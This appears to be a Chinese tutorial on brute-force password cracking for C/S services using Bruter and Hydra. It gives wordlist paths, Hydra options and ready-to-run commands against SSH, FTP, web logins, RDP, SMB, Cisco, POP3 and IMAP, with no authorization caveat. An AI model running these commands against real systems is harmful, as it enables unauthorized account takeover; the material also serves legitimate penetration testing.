ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
[TOC] ## CS架构暴力猜解 指软件,数据库,操作系统,3389相关的破解。C/S 即客户端/服务器,基于 C/S 架构的应用程序 如 ssh ftpsql-server mysql 等, 这些服务往往提供一个高权限的用户,使用这些高权限的用户能在很大程度上给开发人员带来方便,但如果口令被破解带来的危害也是相当大的。 C/S 架构主要使用的破解工具 Hydra、Bruter、X-scan ### window下建议使用bruter 使用步骤: 1. 添加地址,选择协议,端口 2. 添加用户名 linux默认用户名一般是root,windows是administrator 3. 选择字典 注意不支持中文目录 也可以不用字典,用自带功能的字符组合方式 4. 开始 ### Linux下建议使用hydra 该软件kali自带,也可以自己下载安装,注意hydra-gtk是有图形化界面的,命令行或图形化都可以 hydra 是著名黑客组织 thc 的一款开源的暴力密码破解工具,可以在线破解多种密码。官网:http://www.thc.org/thc-hydra kail 密码字典 ``` /usr/share/wfuzz/wordlist/others/names.txt /usr/share/wfuzz/wordlist/others/common_pass.txt ``` #### hydra参数: ```sh hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用 SSL 链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户名,对特定用户破解。 -L FILE 指定用户名字典。 -p PASS 小写,指定密码破解,少用,一般是采用密码字典。 -P FILE 大写,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。一般都是加上的 -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数。 -M FILE 指定目标列表文件一行一条。 -o FILE 指定结果输出文件。 -f ,找到第一对登录名或者密码的时候中止破解。 -t TASKS 同时运行的线程数,默认为 16。 -w TIME 设置最大超时的时间,单位秒,默认是 30s。 server 目标 ip service 指定服务名,如telnet ftp pop3 smb smbnt mssql mysql snmp 等 ``` #### 使用举例 破解ssh ```sh hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh #破解成功,直接显示结果。也可以使用 -o 选项指定结果输出文件。 hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh ``` 常规用法汇总 ```sh #1.破解 ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh #2.破解 ftp: hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认 16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV #3.get方式提交,破解 web 登录: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php #4.post 方式提交,破解 web 登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login" (说明:http-post-form 表示破解是采用 http 的 post 方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。) #5.破解 https: hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https #6.破解 teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak #7.破解 cisco设备: hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable #8.破解 smb: hydra -l administrator -P pass.txt 10.36.16.18 smb #9.破解 pop3: hydra -l muts -P pass.txt my.pop3.mail pop3 #10.破解 rdp: hydra ip rdp -l administrator -P pass.txt -V #11.破解 http-proxy: hydra -l admin -P pass.txt http-proxy://10.36.16.18 #12.破解 imap: hydra -L user.txt -p secret 10.36.16.18 imap PLAIN ``` ## 暴力破解工具选择 >对于爆破软件的选择,主要看速度,稳定性,支持的协议数 >这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解, >其密码能否被破解关键在于字典是否足够强大。